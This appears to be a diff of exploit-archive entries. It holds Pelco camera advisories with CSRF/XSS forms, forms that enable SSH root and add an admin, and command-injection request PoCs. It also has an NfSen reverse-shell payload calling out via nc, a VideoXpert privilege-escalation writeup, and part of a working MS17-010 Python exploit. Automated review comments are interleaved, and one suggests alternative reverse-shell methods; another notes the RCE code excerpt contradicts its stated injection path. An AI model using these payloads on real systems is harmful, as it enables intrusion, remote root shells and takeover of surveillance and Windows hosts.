scripts is not properly sanitized before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5415
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
-------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/dot1x/update" method="POST">
<input type="hidden" name="dot1x" value="on" />
<input type="hidden" name="protocol" value="EAP&#45;TLS" />
<input type="hidden" name="inner&#95;auth" value="CHAP" />
<input type="hidden" name="username" value='"><script>alert(1)</script>' />
<input type="hidden" name="password" value="blah" />
<input type="hidden" name="anonymous&#95;id" value="&#13;" />
<input type="hidden" name="ca&#95;certificate" value="test" />
<input type="hidden" name="client&#95;certificate" value="test" />
<input type="hidden" name="private&#95;key" value="test" />
<input type="hidden" name="private&#95;key&#95;password" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
-------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/general/update" method="POST">
<input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
<input type="hidden" name="http&#95;port" value='"><script>alert(3)</script>' />
<input type="hidden" name="rtsp&#95;port" value='"><script>alert(4)</script>' />
<input type="hidden" name="dhcp" value="off" />
<input type="hidden" name="ip&#95;address" value='"><script>alert(5)</script>' />
<input type="hidden" name="subnet&#95;mask" value='"><script>alert(6)</script>' />
<input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
<input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on version parameter:
------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
<input type="hidden" name="version" value='";alert(9)//' />
<input type="hidden" name="v2&#95;community&#95;string" value="public" />
<input type="hidden" name="v2&#95;receiver&#95;address" value="" />
<input type="hidden" name="v2&#95;trap&#95;community&#95;string" value="trapbratce" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
----------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/system/general/update" method="POST">
<input type="hidden" name="device&#95;name" value='ZSL"><script>alert(10)</script>' />
<input type="hidden" name="enable&#95;leds" value="on" />
<input type="hidden" name="smtp&#95;server" value='"><script>alert(11)</script>' />
<input type="hidden" name="ntp&#95;server&#95;from&#95;dhcp" value="false" />
<input type="hidden" name="ntp&#95;server" value="';alert(12)//'" />
<input type="hidden" name="region" value="Macedonia';alert(13)//" />
<input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
<input type="hidden" name="enable&#95;time&#95;overlay" value="on" />
<input type="hidden" name="enable&#95;name&#95;overlay" value="off" />
<input type="hidden" name="position" value="topright" />
<input type="hidden" name="date&#95;format" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
--------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="relay&#95;sentinel" value="relay&#95;sentinel" />
<input type="hidden" name="name" value='"><script>alert(15)</script>' />
<input type="hidden" name="type" value="Ftp" />
<input type="hidden" name="email&#95;to" value="" />
<input type="hidden" name="email&#95;from" value="" />
<input type="hidden" name="email&#95;subject" value="" />
<input type="hidden" name="email&#95;message" value="" />
<input type="hidden" name="dest&#95;name" value="IMG&#37;m&#37;d&#37;Y&#37;H&#37;M&#37;S&#46;jpg" />
<input type="hidden" name="limit&#95;size" value="" />
<input type="hidden" name="limit&#95;size&#95;scale" value="K" />
<input type="hidden" name="ftp&#95;server" value='"><script>alert(16)</script>' />
<input type="hidden" name="ftp&#95;username" value='"><script>alert(17)</script>' />
<input type="hidden" name="ftp&#95;password" value='"><script>alert(18)</script>' />
<input type="hidden" name="ftp&#95;base&#95;path" value='"><script>alert(19)</script>' />
<input type="hidden" name="ftp&#95;dest&#95;name" value="IMG&#37;m&#37;d&#37;Y&#37;H&#37;M&#37;S&#46;jpg" />
<input type="hidden" name="relay&#95;bankName" value="GPIO" />
<input type="hidden" name="relay&#95;index" value="0" />
<input type="hidden" name="relay&#95;on&#95;time" value="0&#46;1" />
<input type="hidden" name="relay&#95;off&#95;time" value="0&#46;1" />
<input type="hidden" name="relay&#95;pulse&#95;count" value="" />
<input type="hidden" name="filter&#95;start0" value="" />
<input type="hidden" name="filter&#95;stop0" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
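Review bot: the Desc ("multiple dom-based, stored and reflected XSS vulnerabilities") claims more than the hunk demonstrates: all five PoCs are cross-origin POST forms that write the payload into a persistent camera setting (`username`, `hostname`, `device_name`, `ftp_server`, ...), which is stored XSS delivered through CSRF, and no request/response pair is given for a DOM-based or a reflected case. Either add those cases or narrow the description to what is shown. The last heading, `XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:`, also breaks the pattern of the four `CSRF/XSS on ...` headings before it even though the `/setup/events/handlers/update` form is the same kind of cross-site request; make the headings consistent. Finally, the `version` payload `";alert(9)//` and the `ntp_server`/`region`/`zone` payloads of the form `';alert(13)//` are JavaScript-string-context breakouts, unlike the `"><script>alert(n)</script>` HTML-context payloads used elsewhere; one line per section saying which response context each parameter lands in would let readers tell the sinks apart.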

@ -0,0 +1,82 @@
Schneider Electric Pelco Sarix/Spectra Cameras CSRF Enable SSH Root Access
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. Sarix™ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVision™ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5416
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5416.php
07.04.2017
--
CSRF enable ssh root access:
----------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/network/ssh/update" method="POST">
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="password" value="root123" />
<input type="hidden" name="password&#95;confirmation" value="root123" />
<input type="submit" value="Go root" />
</form>
</body>
</html>
CSRF add admin:
---------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/setup/auth/users/create" method="POST">
<input type="hidden" name="original&#95;username" value="" />
<input type="hidden" name="mode" value="create" />
<input type="hidden" name="group" value="admins" />
<input type="hidden" name="username" value="pelco_admin" />
<input type="hidden" name="password" value="pelco_pass" />
<input type="hidden" name="password&#95;confirmation" value="pelco_pass" />
<input type="submit" value="Add admin" />
</form>
</body>
</html>
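Review bot: the Desc ("perform certain actions with administrative privileges") understates the impact and never names the unprotected endpoints. State it concretely: a cross-site POST to `/setup/network/ssh/update` with `enabled=1` and an attacker-chosen `password`/`password_confirmation` turns SSH on with that password (the title calls this root access, so say which account the password applies to), and a POST to `/setup/auth/users/create` with `group=admins` creates a persistent administrator account. Also spell out what the PoC relies on: neither form carries a token, so the handlers evidently accept a state-changing request on the strength of the session cookie alone, which the victim's browser attaches cross-site. The `history.pushState('', '', '/')` line only hides the attacker page's URL from the address bar and is not part of the bypass; a short comment saying so would stop readers treating it as a required step.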

@ -0,0 +1,191 @@
Schneider Electric Pelco Sarix/Spectra Cameras Root Remote Code Execution
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. Sarix™ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVision™ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.
Desc: The affected cameras suffer from authenticated remote code
execution vulnerability. The POST parameter 'enable_leds' located
in the update() function called via the GeneralSetupController.php
script is not properly sanitised before being used in writeLedConfig()
function to enable led state to on or off. A remote attacker can
exploit this issue and execute arbitrary system commands granting
her system access with root privileges using a specially crafted
request and escape sequence to system shell.
---------------------------------------------------------------------------
/var/www/core/setup/controllers/GeneralSetupController.php:
-----------------------------------------------------------
43: public function update() {
44: $errOccurred = false;
45: $logoreboot = false;
46:
47: // If can update general settings
48: if ($this->_context->_user->hasPermission("{51510980-768b-4b26-a44a-2ae49f308184}")) {
49:
50: $errors = $this->validateInputs("setup", "general.invalid");
51:
52: //
53: $new_logo_path;
54: if (empty($errors) && (strlen($_FILES["new_logo_path"]["name"]) > 0)) {
55: // The user has provided a file to load in as an image. Verify that the file is ok.
56: $errors = $this->storeBmpFileIfValid($new_logo_path, $width, $height);
57: } else {
58: // In this case, get the width and height from the omons settings
59: $width = intval($this->_conf->get("Video/Overlay", "LogoWidth"));
60: $height = intval($this->_conf->get("Video/Overlay", "LogoHeight"));
61: }
62: //
63: if (empty($errors)) {
64: $device_name = $_POST["device_name"];
65:
66: $this->_conf->set("Device", "FriendlyName", $device_name);
67:
68: // update smtp server; append port 25 if it's not provided by the user
69: $smtpServer = $_POST["smtp_server"];
70:
71: if ((! empty($smtpServer)) && preg_match(self::kHostPortRegex, $smtpServer) == 0) {
72: $smtpServer .= ":" . self::kDefaultSmtpPort;
73: }
74:
75: $this->_conf->set("Networking", "SmtpServer", $smtpServer);
76:
77: //
78: $success = $this->writeLedConfig($_POST["enable_leds"]);
79: //
80: } else {
81: $this->_context->setError("phobos", "validation.failure");
82: $this->_context->setErrorList($errors);
83:
84: $errOccurred = true;
85: }
86: }
...
...
...
Bonus hint: When uploading a bmp logo, you can modify the width offset for example and inject persistent code:
--
-> 12h: 00 01 00 00 ; width (max 0x100, min 0x20)
--
191: if ($logoOverlay) {
192: if($logoreboot) {
193: $cmd = "/usr/bin/overlayLogo " . $logo_justification . " " . $logo_row . " " . $width . " " . $height . " 0";
194: exec($cmd);
195: }
196: } else {
197: $cmd = "/usr/bin/overlayLogo 1 1 1 1 1";
198: exec($cmd);
199: }
...
...
...
265: $vparams["enable_leds"] = $this->getLedConfig();
266: //
267: $vparams["device_name"] = $this->_conf->get("Device", "FriendlyName");
268: $vparams["TimeFormat"] = $this->_conf->get("Video/Overlay", "TimeFormat");
269: $vparams["date_formats"] = $this->getDateFormats();
270: $vparams["selectedDateFormat"] = $this->_conf->get("Video/Overlay", "DateFormat");
271:
272: ob_start();
273: passthru("date +\"" . $vparams["TimeFormat"] . "\"");
274: $vparams["current_time"] = trim(ob_get_contents());
275: ob_end_clean();
...
...
...
630: /** @param $state string "on" or "off" */
631: protected function writeLedConfig($state) {
632: $encoded = array('type' => 'uint32',
633: 'value' => ($state == 'on' ? 1 : 0));
634:
635: $rest = $this->getRestProxy();
636: $params = array(array('type' => 'uint32', 'value' => 10), $encoded);
637: $response = $rest->GetWithPayload('/internal/msgbus/com.pelco.hardware.led/SetState?',
638: 'application/json',
639: $params);
640:
641: return ($response->GetStatus() == 200);
642: }
---------------------------------------------------------------------------
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
Lighttpd/1.4.28
PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5417
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5417.php
07.04.2017
--
PoC sleep 17s:
POST /setup/system/general/update HTTP/1.1
Host: 192.168.1.1
Content-Length: x
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.1/setup/system/general
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: PHPSESSID=p2ooorb7gloavc0et2stj2tnn4; authos-token=07E14CAF; svcts=1495616826
Connection: close
device_name=ZSL&enable_leds=%60sleep%2017%60&smtp_server=&ntp_server_from_dhcp=false&ntp_server=time.nist.gov&region=Universe&zone=Earth&enable_time_overlay=on&enable_name_overlay=off&position=topright&date_format=0
===
PoC echo:
POST /setup/system/general/update HTTP/1.1
Host: 192.168.1.1
enable_leds=%60echo%20251%20>test.html%60
--
GET http://192.168.1.1/test.html HTTP/1.1
Response:
251
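Review bot: the code excerpt does not support the stated injection path. The Desc says `enable_leds` is not sanitised before being used in `writeLedConfig()`, but the `writeLedConfig()` shown at the end of the listing collapses `$state` to `($state == 'on' ? 1 : 0)` and sends the result as a uint32 in a REST payload to `/internal/msgbus/com.pelco.hardware.led/SetState`, so the backtick payload `%60sleep%2017%60` cannot reach a shell through that function. The shell sinks that are visible in the excerpt are `exec($cmd)` with unquoted `$width`/`$height` in the `/usr/bin/overlayLogo` command (and `$width` in the file-upload branch comes back from `storeBmpFileIfValid()` without the `intval()` the else-branch applies, which is what the BMP width hint exploits) and `passthru("date +\"" . $vparams["TimeFormat"] . "\"")`. Include the component that consumes the raw `enable_leds` value on its way to a shell, otherwise the 17-second delay and the written `test.html` are unexplained by the code shown. Minor: `Content-Length: x` in the first PoC is a placeholder that makes the request invalid as written; drop the header or give the real length.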

@ -0,0 +1,28 @@
# Exploit Title: NfSen/AlienVault remote root exploit (command injection in customfmt parameter)
# Version: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all. Previous versions are also likely to be affected.
# Version: AlienVault USM/OSSIM < 4.3.1
# Date: 2017-07-10
# Vendor Homepage: http://nfsen.sourceforge.net/
# Vendor Homepage: http://www.alienvault.com/
# Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Tested on: NfSen 1.3.7
# CVE: CVE-2017-7175, CVE-2017-6972
1. Description
A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request with shell commands which will be executed as root on a vulnerable system. The injection is covered by CVE-2017-7175, and the commands are executed as root due to CVE-2017-6972.
2. Proof of Concept
For a reverse shell to attacking machine 10.100.1.2, on the NfSen / AlienVault netflow processing web page, enter the following into the "Custom output format:" input box:
'; nc -ne /bin/bash 10.100.1.2 443 #
If nc is not installed on the target, then alternative attacks are likely to be possible to leverage the vulnerability.
3. Solution:
Update to latest version of NfSen/USM/OSSIM
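Review bot: the PoC payload `'; nc -ne /bin/bash 10.100.1.2 443 #` relies on a netcat build that supports `-e` (nc.traditional or Ncat); the OpenBSD netcat shipped by most current Debian-family systems lacks that flag, so the line "If nc is not installed on the target" covers only part of the cases where this fails. Name a fallback that needs no netcat (a bash `/dev/tcp` redirect, or a perl/python one-liner) rather than leaving it implied. The Solution line "Update to latest version of NfSen/USM/OSSIM" should also name a fixed release: the header bounds OSSIM (`< 4.3.1`) but gives no fixed version for NfSen even though `1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all` are listed as affected. Finally, the Description splits the issue into CVE-2017-7175 (injection) and CVE-2017-6972 (execution as root) but does not say which component runs as root; one sentence on that would make the two-CVE split understandable.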

platforms/windows/local/42310.txt Executable file
@ -0,0 +1,107 @@
Schneider Electric Pelco VideoXpert Privilege Escalations
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Core Software 1.12.105
Media Gateway Software 1.12.26
Exports 1.12
Summary: VideoXpert is a video management solution designed for
scalability, fitting the needs surveillance operations of any size.
VideoXpert Ultimate can also aggregate other VideoXpert systems,
tying multiple video management systems into a single interface.
Desc: The application is vulnerable to an elevation of privileges
vulnerability which can be used by a simple user that can change
the executable file with a binary of choice. The vulnerability exist
due to the improper permissions, with the 'F' flag (full) for the
'Users' group, for several binary files. The service is installed
by default to start on system boot with LocalSystem privileges.
Attackers can replace the binary with their rootkit, and on reboot
they get SYSTEM privileges.
VideoXpert services also suffer from an unquoted search path issue
impacting the 'VideoXpert Core' and 'VideoXpert Exports' services
for Windows deployed as part of the VideoXpert Setup bundle. This
could potentially allow an authorized but non-privileged local user
to execute arbitrary code with elevated privileges on the system. A
successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local users code would execute
with the elevated privileges of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5418
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5418.php
05.04.2017
--
C:\Program Files\Pelco\Core>sc qc "VideoXpert Core"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VideoXpert Core
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Pelco\Core\tools\nssm.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VideoXpert Core
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>cacls "C:\Program Files\Pelco\Core\tools\nssm.exe"
C:\Program Files\Pelco\Core\tools\nssm.exe NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\ProgramData\Pelco\Core\db\bin>cacls * |findstr "Users:(ID)F"
C:\ProgramData\Pelco\Core\db\bin\libeay32.dll BUILTIN\Users:(ID)F
C:\ProgramData\Pelco\Core\db\bin\mongod.exe BUILTIN\Users:(ID)F
C:\ProgramData\Pelco\Core\db\bin\mongos.exe BUILTIN\Users:(ID)F
C:\ProgramData\Pelco\Core\db\bin\nssm.exe BUILTIN\Users:(ID)F
C:\ProgramData\Pelco\Core\db\bin\ssleay32.dll BUILTIN\Users:(ID)F
C:\>cacls "C:\ProgramData\Pelco\Exports\bin\nssm.exe"
C:\ProgramData\Pelco\Exports\bin\nssm.exe BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
C:\>cacls "C:\ProgramData\Pelco\Gateway\bin\nssm.exe"
C:\ProgramData\Pelco\Gateway\bin\nssm.exe BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
C:\Users\senad>sc qc "VideoXpert Exports"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VideoXpert Exports
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\ProgramData\Pelco\Exports\bin\nssm.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VideoXpert Exports
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
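Review bot: the evidence supports only part of the unquoted-search-path claim. `sc qc "VideoXpert Core"` gives `BINARY_PATH_NAME : C:\Program Files\Pelco\Core\tools\nssm.exe`, an unquoted path with a space, but `sc qc "VideoXpert Exports"` gives `C:\ProgramData\Pelco\Exports\bin\nssm.exe`, which contains no spaces and so has no unquoted-path issue; drop Exports from that paragraph or show output that applies to it. Conversely, the weak-ACL finding is well supported for Exports and Gateway (`BUILTIN\Users:(ID)F` on both `nssm.exe` files), while the Core service binary `C:\Program Files\Pelco\Core\tools\nssm.exe` shows `BUILTIN\Users:(ID)R` and is therefore not replaceable; the writable Core files are the MongoDB binaries under `C:\ProgramData\Pelco\Core\db\bin`, and the hunk never shows which service launches `mongod.exe`. Add the `sc qc` output for that service (or state that Core's `nssm.exe` spawns it) so the replace-binary, LocalSystem-on-reboot chain is complete for Core as well.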

platforms/windows/remote/42315.py Executable file
@ -0,0 +1,538 @@
#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time
'''
MS17-010 exploit for Windows 7+ by sleepya
Note:
- The exploit should never crash a target (chance should be nearly 0%)
- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
Tested on:
- Windows 2016 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
'''
USERNAME = ''
PASSWORD = ''
'''
Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext()
win7 x64
struct SrvSecContext {
DWORD xx1; // second WORD is size
DWORD refCnt;
PACCESS_TOKEN Token; // 0x08
DWORD xx2;
BOOLEAN CopyOnOpen; // 0x14
BOOLEAN EffectiveOnly;
WORD xx3;
DWORD ImpersonationLevel; // 0x18
DWORD xx4;
BOOLEAN UsePsImpersonateClient; // 0x20
}
win2012 x64
struct SrvSecContext {
DWORD xx1; // second WORD is size
DWORD refCnt;
QWORD xx2;
QWORD xx3;
PACCESS_TOKEN Token; // 0x18
DWORD xx4;
BOOLEAN CopyOnOpen; // 0x24
BOOLEAN EffectiveOnly;
WORD xx3;
DWORD ImpersonationLevel; // 0x28
DWORD xx4;
BOOLEAN UsePsImpersonateClient; // 0x30
}
SrvImpersonateSecurityContext() is used in Windows 7 and later before doing any operation as logged on user.
It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true.
From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL,
PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns
STATUS_SUCCESS when Token is NULL.
If we can overwrite Token to NULL and UsePsImpersonateClient to true, a running thread will use primary token (SYSTEM)
to do all SMB operations.
Note: fake Token might be possible, but NULL token is much easier.
'''
WIN7_INFO = {
'SESSION_SECCTX_OFFSET': 0xa0,
'SESSION_ISNULL_OFFSET': 0xba,
'FAKE_SECCTX': pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE': 0x28,
}
WIN7_32_INFO = {
'SESSION_SECCTX_OFFSET': 0x80,
'SESSION_ISNULL_OFFSET': 0x96,
'FAKE_SECCTX': pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE': 0x1c,
}
# win8+ info
WIN8_INFO = {
'SESSION_SECCTX_OFFSET': 0xb0,
'SESSION_ISNULL_OFFSET': 0xca,
'FAKE_SECCTX': pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE': 0x38,
}
WIN8_32_INFO = {
'SESSION_SECCTX_OFFSET': 0x88,
'SESSION_ISNULL_OFFSET': 0x9e,
'FAKE_SECCTX': pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE': 0x24,
}
X86_INFO = {
'PTR_SIZE' : 4,
'PTR_FMT' : 'I',
'FRAG_TAG_OFFSET' : 12,
'POOL_ALIGN' : 8,
'SRV_BUFHDR_SIZE' : 8,
'TRANS_SIZE' : 0xa0, # struct size
'TRANS_FLINK_OFFSET' : 0x18,
'TRANS_INPARAM_OFFSET' : 0x40,
'TRANS_OUTPARAM_OFFSET' : 0x44,
'TRANS_INDATA_OFFSET' : 0x48,
'TRANS_OUTDATA_OFFSET' : 0x4c,
'TRANS_FUNCTION_OFFSET' : 0x72,
'TRANS_MID_OFFSET' : 0x80,
}
X64_INFO = {
'PTR_SIZE' : 8,
'PTR_FMT' : 'Q',
'FRAG_TAG_OFFSET' : 0x14,
'POOL_ALIGN' : 0x10,
'SRV_BUFHDR_SIZE' : 0x10,
'TRANS_SIZE' : 0xf8, # struct size
'TRANS_FLINK_OFFSET' : 0x28,
'TRANS_INPARAM_OFFSET' : 0x70,
'TRANS_OUTPARAM_OFFSET' : 0x78,
'TRANS_INDATA_OFFSET' : 0x80,
'TRANS_OUTDATA_OFFSET' : 0x88,
'TRANS_FUNCTION_OFFSET' : 0xb2,
'TRANS_MID_OFFSET' : 0xc0,
}
def wait_for_request_processed(conn):
#time.sleep(0.05)
# send echo is faster than sleep(0.05) when connection is very good
conn.send_echo('a')
special_mid = 0
extra_last_mid = 0
def reset_extra_mid(conn):
global extra_last_mid, special_mid
special_mid = (conn.next_mid() & 0xff00) - 0x100
extra_last_mid = special_mid
def next_extra_mid():
global extra_last_mid
extra_last_mid += 1
return extra_last_mid
# Borrow 'groom' and 'bride' word from NSA tool
# GROOM_TRANS_SIZE includes transaction name, parameters and data
GROOM_TRANS_SIZE = 0x5010
def calc_alloc_size(size, align_size):
return (size + align_size - 1) & ~(align_size-1)
def leak_frag_size(conn, tid, fid, info):
# A "Frag" pool is placed after the large pool allocation if last page has some free space left.
# A "Frag" pool size (on 64-bit) is 0x10 or 0x20 depended on Windows version.
# To make exploit more generic, exploit does info leak to find a "Frag" pool size.
# From the leak info, we can determine the target architecture too.
mid = conn.next_mid()
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-4)
req2 = conn.create_nt_trans_secondary_packet(mid, data='B'*276) # leak more 276 bytes
conn.send_raw(req1[:-8])
conn.send_raw(req1[-8:]+req2)
leakData = conn.recv_transaction_data(mid, 0x10d0+276)
leakData = leakData[0x10d4:] # skip parameters and its own input
if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
print('Target is 32 bit')
if info['SESSION_SECCTX_OFFSET'] == WIN7_INFO['SESSION_SECCTX_OFFSET']:
info.update(WIN7_32_INFO)
elif info['SESSION_SECCTX_OFFSET'] == WIN8_INFO['SESSION_SECCTX_OFFSET']:
info.update(WIN8_32_INFO)
else:
print('The exploit does not support this 32 bit target')
sys.exit()
info.update(X86_INFO)
elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
print('Target is 64 bit')
info.update(X64_INFO)
else:
print('Not found Frag pool tag in leak data')
sys.exit()
# Calculate frag pool size
info['FRAG_POOL_SIZE'] = ord(leakData[ info['FRAG_TAG_OFFSET']-2 ]) * info['POOL_ALIGN']
print('Got frag size: 0x{:x}'.format(info['FRAG_POOL_SIZE']))
# groom: srv buffer header
info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])
print('GROOM_POOL_SIZE: 0x{:x}'.format(info['GROOM_POOL_SIZE']))
# groom paramters and data is alignment by 8 because it is NT_TRANS
info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - 4 - 4 - info['TRANS_SIZE'] # empty transaction name (4), alignment (4)
# bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)
bridePoolSize = 0x1000 - (info['GROOM_POOL_SIZE'] & 0xfff) - info['FRAG_POOL_SIZE']
info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])
print('BRIDE_TRANS_SIZE: 0x{:x}'.format(info['BRIDE_TRANS_SIZE']))
# bride paramters and data is alignment by 4 because it is TRANS
